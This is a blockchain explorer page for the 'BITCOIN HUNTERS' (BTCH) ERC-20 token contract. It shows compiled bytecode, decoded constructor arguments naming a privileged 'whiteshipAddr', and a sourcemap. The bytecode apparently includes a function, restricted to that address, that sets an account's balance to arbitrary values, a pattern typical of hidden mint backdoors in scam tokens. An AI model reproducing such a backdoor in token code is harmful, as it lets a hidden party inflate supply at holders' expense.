62461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610455565b61065081610941565b50565b6001600160a01b0383166106b75760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610455565b6001600160a01b0382166107195760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610455565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107e05760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610455565b6001600160a01b0382166108425760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610455565b61087f81604051806060016040528060278152602001610b99602791396001600160a01b0386166000908152600160205260409020549190610902565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108ae908261092e565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061076e9085815260200190565b600081848411156109265760405162461bcd60e51b81526004016104559190610991565b505050900390565b600061093a8284610b5f565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109be578581018301518582016040015282016109a2565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109f657600080fd5b919050565b60008060408385031215610a0e57600080fd5b610a17836109df565b946020939093013593505050565b600080600060608486031215610a3a57600080fd5b610a43846109df565b9250610a51602085016109df565b9150604084013590509250925092565b600060208284031215610a7357600080fd5b61093a826109df565b60008060008060808587031215610a9257600080fd5b84358015158114610aa257600080fd5b9350610ab0602086016109df565b93969395505050506040820135916060013590565b60008060408385031215610ad857600080fd5b610ae1836109df565b9150610aef602084016109df565b90509250929050565b600181811c90821680610b0c57607f821691505b602082108103610b2c57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761035a5761035a610b32565b8082018082111561035a5761035a610b3256fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220d5e0511ed3fb02060a7a36bfb28edd377d845e3342e0c1c06abd6bdbb4db77e964736f6c63430008130033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000c3e429577dd7e6595ef884a89355570a4c119ebc0000000000000000000000000000000000000001027e72f1f128130880000000000000000000000000000000000000000000000000000000000000000000000f424954434f494e2048554e54455253000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044254434800000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): BITCOIN HUNTERS
Arg [1] : symbol_ (string): BTCH
Arg [2] : decimals_ (uint8): 18
Arg [3] : whiteshipAddr (address): 0xC3e429577DD7E6595Ef884a89355570A4c119eBc
Arg [4] : totalSupply_ (uint256): 80000000000000000000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 000000000000000000000000c3e429577dd7e6595ef884a89355570a4c119ebc
Arg [4] : 0000000000000000000000000000000000000001027e72f1f128130880000000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000f
Arg [6] : 424954434f494e2048554e544552530000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [8] : 4254434800000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
13674:6087:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14691:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15726:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;15726:210:0;1004:187:1;14992:108:0;15080:12;;14992:108;;;1342:25:1;;;1330:2;1315:18;14992:108:0;1196:177:1;13989:31:0;;;;;;15944:455;;;;;;:::i;:::-;;:::i;14893:91::-;14967:9;;14893:91;;14967:9;;;;1853:36:1;;1841:2;1826:18;14893:91:0;1711:184:1;16407:300:0;;;;;;:::i;:::-;;:::i;14031:28::-;;;;;-1:-1:-1;;;;;14031:28:0;;;;;;-1:-1:-1;;;;;2064:32:1;;;2046:51;;2034:2;2019:18;14031:28:0;1900:203:1;15108:177:0;;;;;;:::i;:::-;-1:-1:-1;;;;;15259:18:0;15227:7;15259:18;;;:9;:18;;;;;;;15108:177;5467:94;;;:::i;:::-;;13947:31;;;;;;4816:87;4862:7;4889:6;-1:-1:-1;;;;;4889:6:0;4816:87;;14790:95;;;:::i;17903:374::-;;;;;;:::i;:::-;;:::i;16715:401::-;;;;;;:::i;:::-;;:::i;15293:216::-;;;;;;:::i;:::-;;:::i;15517:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15683:18:0;;;15651:7;15683:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15517:201;5716:192;;;;;;:::i;:::-;;:::i;14691:91::-;14736:13;14769:5;14762:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14691:91;:::o;15726:210::-;15845:4;15867:39;3614:10;15890:7;15899:6;15867:8;:39::i;:::-;-1:-1:-1;15924:4:0;15726:210;;;;;:::o;15944:455::-;16084:4;16101:36;16111:6;16119:9;16130:6;16101:9;:36::i;:::-;16148:221;16171:6;3614:10;16219:139;16275:6;16219:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16219:19:0;;;;;;:11;:19;;;;;;;;3614:10;16219:33;;;;;;;;;;:37;:139::i;:::-;16148:8;:221::i;:::-;-1:-1:-1;16387:4:0;15944:455;;;;;:::o;16407:300::-;3614:10;16522:4;16616:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16616:34:0;;;;;;;;;;16522:4;;16544:133;;16594:7;;16616:50;;16655:10;16616:38;:50::i;5467:94::-;4862:7;4889:6;-1:-1:-1;;;;;4889:6:0;3614:10;5036:23;5028:68;;;;-1:-1:-1;;;5028:68:0;;3640:2:1;5028:68:0;;;3622:21:1;;;3659:18;;;3652:30;3718:34;3698:18;;;3691:62;3770:18;;5028:68:0;;;;;;;;;5532:21:::1;5550:1;5532:9;:21::i;:::-;5467:94::o:0;14790:95::-;14837:13;14870:7;14863:14;;;;;:::i;17903:374::-;17201:11;;-1:-1:-1;;;;;17201:11:0;3614:10;-1:-1:-1;;;;;17185:27:0;;17167:77;;;;-1:-1:-1;;;17167:77:0;;4001:2:1;17167:77:0;;;3983:21:1;4040:2;4020:18;;;4013:30;4079:29;4059:18;;;4052:57;4126:18;;17167:77:0;3799:351:1;17167:77:0;18101:13:::1;:30:::0;;-1:-1:-1;;;;;;18101:30:0::1;-1:-1:-1::0;;;;;18101:30:0;::::1;;::::0;;18132:16:::1;:36:::0;;;18169:16:::1;:36:::0;;;18234:35:::1;18169:36:::0;18132;18234:35:::1;:::i;:::-;18217:13;::::0;-1:-1:-1;;;;;18217:13:0::1;18207:24;::::0;;;:9:::1;:24;::::0;;;;:62;-1:-1:-1;;;;17903:374:0:o;16715:401::-;16835:4;16857:229;3614:10;16907:7;16929:146;16986:15;16929:146;;;;;;;;;;;;;;;;;3614:10;16929:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16929:34:0;;;;;;;;;;;;:38;:146::i;15293:216::-;15415:4;15437:42;3614:10;15461:9;15472:6;15437:9;:42::i;5716:192::-;4862:7;4889:6;-1:-1:-1;;;;;4889:6:0;3614:10;5036:23;5028:68;;;;-1:-1:-1;;;5028:68:0;;3640:2:1;5028:68:0;;;3622:21:1;;;3659:18;;;3652:30;3718:34;3698:18;;;3691:62;3770:18;;5028:68:0;3438:356:1;5028:68:0;-1:-1:-1;;;;;5805:22:0;::::1;5797:73;;;::::0;-1:-1:-1;;;5797:73:0;;4662:2:1;5797:73:0::1;::::0;::::1;4644:21:1::0;4701:2;4681:18;;;4674:30;4740:34;4720:18;;;4713:62;-1:-1:-1;;;4791:18:1;;;4784:36;4837:19;;5797:73:0::1;4460:402:1::0;5797:73:0::1;5881:19;5891:8;5881:9;:19::i;:::-;5716:192:::0;:::o;19137:382::-;-1:-1:-1;;;;;19273:19:0;;19265:69;;;;-1:-1:-1;;;19265:69:0;;5069:2:1;19265:69:0;;;5051:21:1;5108:2;5088:18;;;5081:30;5147:34;5127:18;;;5120:62;-1:-1:-1;;;5198:18:1;;;5191:35;5243:19;;19265:69:0;4867:401:1;19265:69:0;-1:-1:-1;;;;;19353:21:0;;19345:69;;;;-1:-1:-1;;;19345:69:0;;5475:2:1;19345:69:0;;;5457:21:1;5514:2;5494:18;;;5487:30;5553:34;5533:18;;;5526:62;-1:-1:-1;;;5604:18:1;;;5597:33;5647:19;;19345:69:0;5273:399:1;19345:69:0;-1:-1:-1;;;;;19427:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19479:32;;1342:25:1;;;19479:32:0;;1315:18:1;19479:32:0;;;;;;;;19137:382;;;:::o;17282:613::-;-1:-1:-1;;;;;17422:20:0;;17414:71;;;;-1:-1:-1;;;17414:71:0;;5879:2:1;17414:71:0;;;5861:21:1;5918:2;5898:18;;;5891:30;5957:34;5937:18;;;5930:62;-1:-1:-1;;;6008:18:1;;;6001:36;6054:19;;17414:71:0;5677:402:1;17414:71:0;-1:-1:-1;;;;;17504:23:0;;17496:72;;;;-1:-1:-1;;;17496:72:0;;6286:2:1;17496:72:0;;;6268:21:1;6325:2;6305:18;;;6298:30;6364:34;6344:18;;;6337:62;-1:-1:-1;;;6415:18:1;;;6408:34;6459:19;;17496:72:0;6084:400:1;17496:72:0;17661:109;17697:6;17661:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17661:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17641:17:0;;;;;;;:9;:17;;;;;;:129;;;;17804:20;;;;;;;:32;;17829:6;17804:24;:32::i;:::-;-1:-1:-1;;;;;17781:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17852:35;;;;;;;;;;17880:6;1342:25:1;;1330:2;1315:18;;1196:177;11181:240:0;11301:7;11362:12;11354:6;;;;11346:29;;;;-1:-1:-1;;;11346:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11397:5:0;;;11181:240::o;8902:98::-;8960:7;8987:5;8991:1;8987;:5;:::i;:::-;8980:12;8902:98;-1:-1:-1;;;8902:98:0:o;5916:173::-;5972:16;5991:6;;-1:-1:-1;;;;;6008:17:0;;;-1:-1:-1;;;;;;6008:17:0;;;;;;6041:40;;5991:6;;;;;;;6041:40;;5972:16;6041:40;5961:128;5916:173;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;2108:186::-;2167:6;2220:2;2208:9;2199:7;2195:23;2191:32;2188:52;;;2236:1;2233;2226:12;2188:52;2259:29;2278:9;2259:29;:::i;2299:484::-;2382:6;2390;2398;2406;2459:3;2447:9;2438:7;2434:23;2430:33;2427:53;;;2476:1;2473;2466:12;2427:53;2515:9;2502:23;2568:5;2561:13;2554:21;2547:5;2544:32;2534:60;;2590:1;2587;2580:12;2534:60;2613:5;-1:-1:-1;2637:38:1;2671:2;2656:18;;2637:38;:::i;:::-;2299:484;;2627:48;;-1:-1:-1;;;;2722:2:1;2707:18;;2694:32;;2773:2;2758:18;2745:32;;2299:484::o;2788:260::-;2856:6;2864;2917:2;2905:9;2896:7;2892:23;2888:32;2885:52;;;2933:1;2930;2923:12;2885:52;2956:29;2975:9;2956:29;:::i;:::-;2946:39;;3004:38;3038:2;3027:9;3023:18;3004:38;:::i;:::-;2994:48;;2788:260;;;;;:::o;3053:380::-;3132:1;3128:12;;;;3175;;;3196:61;;3250:4;3242:6;3238:17;3228:27;;3196:61;3303:2;3295:6;3292:14;3272:18;3269:38;3266:161;;3349:10;3344:3;3340:20;3337:1;3330:31;3384:4;3381:1;3374:15;3412:4;3409:1;3402:15;3266:161;;3053:380;;;:::o;4155:127::-;4216:10;4211:3;4207:20;4204:1;4197:31;4247:4;4244:1;4237:15;4271:4;4268:1;4261:15;4287:168;4360:9;;;4391;;4408:15;;;4402:22;;4388:37;4378:71;;4429:18;;:::i;6489:125::-;6554:9;;;6575:10;;;6572:36;;;6588:18;;:::i
Swarm Source
ipfs://d5e0511ed3fb02060a7a36bfb28edd377d845e3342e0c1c06abd6bdbb4db77e9
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Multichain Portfolio | 33 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.